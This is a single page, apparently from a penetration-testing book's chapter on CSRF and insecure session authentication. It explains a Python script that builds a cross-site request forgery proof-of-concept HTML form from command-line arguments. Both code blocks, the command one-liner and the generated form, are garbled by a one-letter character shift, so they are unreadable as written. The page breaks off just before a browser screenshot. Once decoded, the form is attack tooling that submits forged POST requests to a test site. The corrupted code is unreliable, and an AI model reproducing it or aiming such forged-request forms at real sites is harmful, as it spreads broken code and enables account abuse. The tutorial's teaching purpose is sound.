CSRF and Insecure Session Authentication                                    Chapter 6

            The rest of our script is exactly the same. Now we can pass our critical information from the
            command line. Passing the field information right now is a little ungainly, but in the future,
            we could have it read from a generated JSON file or other data source (such as a web
            scraper). Here's what our one-liner currently looks like:
                QZUIPO DPEF DTSG@QPD@HFOFSBUPS QZ  1045   BQQMJDBUJPO Y XXX GPSN
                VSMFODPEFE   IUUQ   XFCTDBOUFTU DPN DTSG DTSGQPTU QIQ   <\  UZQF   UFYU
                 OBNF   QSPQFSUZ    MBCFM   DPMPS    WBMVF    ^>

            And this is what the PoC it outputs looks like:
                 IUNM
                  GPSN BDUJPO  IUUQ   XFCTDBOUFTU DPN DTSG DTSGQPTU QIQ
                FODUZQF  BQQMJDBUJPO Y XXX GPSN VSMFODPEFE  NFUIPE  1045
                   MBCFM
                   DPMPS
                    MBCFM
                   JOQVU OBNF  QSPQFSUZ  UZQF  UFYU  WBMVF
                   JOQVU UZQF  TVCNJU  WBMVF  IUUQ   XFCTDBOUFTU DPN DTSG DTSGQPTU QIQ
                   GPSN
                  IUNM

            Here's what it looks like when we open it in Chrome:



































                                                    [ 108 ]